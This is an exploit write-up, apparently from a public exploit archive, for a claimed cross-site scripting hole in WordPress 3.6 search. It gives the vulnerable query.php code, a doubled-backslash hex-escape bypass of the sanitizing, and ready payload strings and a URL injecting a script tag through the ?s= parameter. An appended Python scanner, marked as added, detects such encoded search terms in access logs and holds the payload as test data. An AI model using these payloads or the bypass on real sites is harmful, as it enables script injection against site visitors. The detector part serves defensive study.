
WordPress 3.6 XSS Exploit

Author: DamaneDz, Published: 17-09-2013
###########################################################################################
# Exploit Title: WordPress 3.6 XSS Exploit
# Author:DamaneDz
# Date: [2013-8-25]
# Tested on: AppServ (Win32) + Apache (Linux)
# How To Fix: Update to the latest version, 3.6.1
###########################################################################################

The vulnerable file: query.php

Lines 2189 to 2213:

PHP Code:

if ( !empty($q['s']) ) {
    // added slashes screw with quote grouping when done early, so done later
    $q['s'] = stripslashes($q['s']);
    if ( empty( $_GET['s'] ) && $this->is_main_query() )
        $q['s'] = urldecode($q['s']);
    if ( !empty($q['sentence']) ) {
        $q['search_terms'] = array($q['s']);
    } else {
        preg_match_all('/".*?("|$)|((?<=[\r\n\t ",+])|^)[^\r\n\t ",+]+/', $q['s'], $matches);
        $q['search_terms'] = array_map('_search_terms_tidy', $matches[0]);
    }
    $n = !empty($q['exact']) ? '' : '%';
    $searchand = '';
    foreach( (array) $q['search_terms'] as $term ) {
        $term = esc_sql( like_escape( $term ) );
        $search .= "{$searchand}(($wpdb->posts.post_title LIKE '{$n}{$term}{$n}') OR ($wpdb->posts.post_content LIKE '{$n}{$term}{$n}'))";
        $searchand = ' AND ';
    }
    if ( !empty($search) ) {
        $search = " AND ({$search}) ";
        if ( !is_user_logged_in() )
            $search .= " AND ($wpdb->posts.post_password = '') ";
    }
}

It applies several sanitizing functions, such as:

stripslashes()
urldecode() // applied if the attacker uses URL encoding

So the only way to bypass them is to use hex (that is, to encode our evil code as hex escapes), like this:

<script>alert(document.domain);</script>

After encoding:
\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x64\x6f\x6d\x61\x69\x6e\x29\x3b\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e

But line 2198:

PHP Code:
$q['search_terms'] = array_map('_search_terms_tidy', $matches[0]);

runs every term through array_map() with the _search_terms_tidy() function.

Let's take a quick look at this function, located in functions.php:

PHP Code:
function _search_terms_tidy($t) {
    return trim($t, "\"'\n\r ");
}

So it turns the '\' of our hex-encoded code back into a plain string, which means we haven't achieved anything.
But I found a method: adding another '\' to our hex code:

\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3e\\x61\\x6c\\x65\\x72\\x74\\x28\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74\\x2e\\x64\\x6f\\x6d\\x61\\x69\\x6e\\x29\\x3b\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e

And that's it for the bypass.
Now, exploiting WordPress:
This will not work yet, because it is not encoded;
it is only here to explain something, in case you want to change the exploitation method:

http://domain.tld/wp/?s=</title><script>alert(document.domain);</script>

Question: Why do I add (</title>) before the evil code?
Answer: It's something I found in the source.
(Another method for finding XSS ;) I will explain it another day.)

So now all we need is to encode this:
</title><script>alert(document.domain);</script>

as hex, adding \\x in front of each pair of hex digits:
\\x3c\\x2f\\x74\\x69\\x74\\x6c\\x65\\x3e\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3e\\x61\\x6c\\x65\\x72\\x74\\x28\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74\\x2e\\x64\\x6f\\x6d\\x61\\x69\\x6e\\x29\\x3b\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e

./DonE
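A detection-side companion to the writeup above, added here and not part of DamaneDz's original: a Python scanner that emulates the `$_GET` percent-decoding and the `_search_terms_tidy()` trim, resolves the `\\xNN` escapes the way a JavaScript string literal would, and flags search requests whose decoded term carries markup. The access-log lines are constructed for this example; the second one carries the page's own encoded payload.

```python
import re
from urllib.parse import urlsplit, parse_qs, quote

# The page's double-backslash hex-escaped search term (decodes to the </title><script> payload).
PAGE_PAYLOAD = (r"\\x3c\\x2f\\x74\\x69\\x74\\x6c\\x65\\x3e\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3e"
                r"\\x61\\x6c\\x65\\x72\\x74\\x28\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74\\x2e"
                r"\\x64\\x6f\\x6d\\x61\\x69\\x6e\\x29\\x3b\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e")

# Constructed Apache access-log lines (not from the page); the second request carries the
# payload percent-encoded the way a browser sends it in ?s=.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Aug/2013:10:01:02 +0000] "GET /wp/?s=wordpress+security HTTP/1.1" 200 5123',
    '203.0.113.9 - - [25/Aug/2013:10:02:17 +0000] "GET /wp/?s=' + quote(PAGE_PAYLOAD)
    + ' HTTP/1.1" 200 5210',
]

HEX_ESCAPE = re.compile(r"\\+x([0-9a-fA-F]{2})")      # \x3c, \\x3c, ... -> one character
MARKUP = re.compile(r"</?\s*(script|title)\b|javascript:", re.I)
LOG_TARGET = re.compile(r'"GET (\S+) HTTP/')

def search_terms_tidy(term):
    """Python equivalent of WordPress's _search_terms_tidy(): strip quotes, newlines and spaces at the ends."""
    return term.strip("\"'\n\r ")

def decode_hex_escapes(term):
    """Resolve backslash-x hex escapes (any number of leading backslashes) as a JS string literal would."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), term)

def classify_request(target):
    """Return (term as WordPress sees it, fully decoded term, suspicious?) for one GET target."""
    raw = parse_qs(urlsplit(target).query).get("s", [""])[0]  # parse_qs percent-decodes like $_GET
    tidy = search_terms_tidy(raw)
    decoded = decode_hex_escapes(tidy)
    return tidy, decoded, bool(MARKUP.search(decoded))

def scan_log(lines):
    """Return (client IP, decoded search term) for requests whose search term hides markup."""
    hits = []
    for line in lines:
        m = LOG_TARGET.search(line)
        if not m:
            continue
        _, decoded, suspicious = classify_request(m.group(1))
        if suspicious:
            hits.append((line.split()[0], decoded))
    return hits
```

Running `scan_log(SAMPLE_LOG)` reports only the second client, with its term decoded back to the `</title><script>...</script>` string, while the plain-text search passes.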
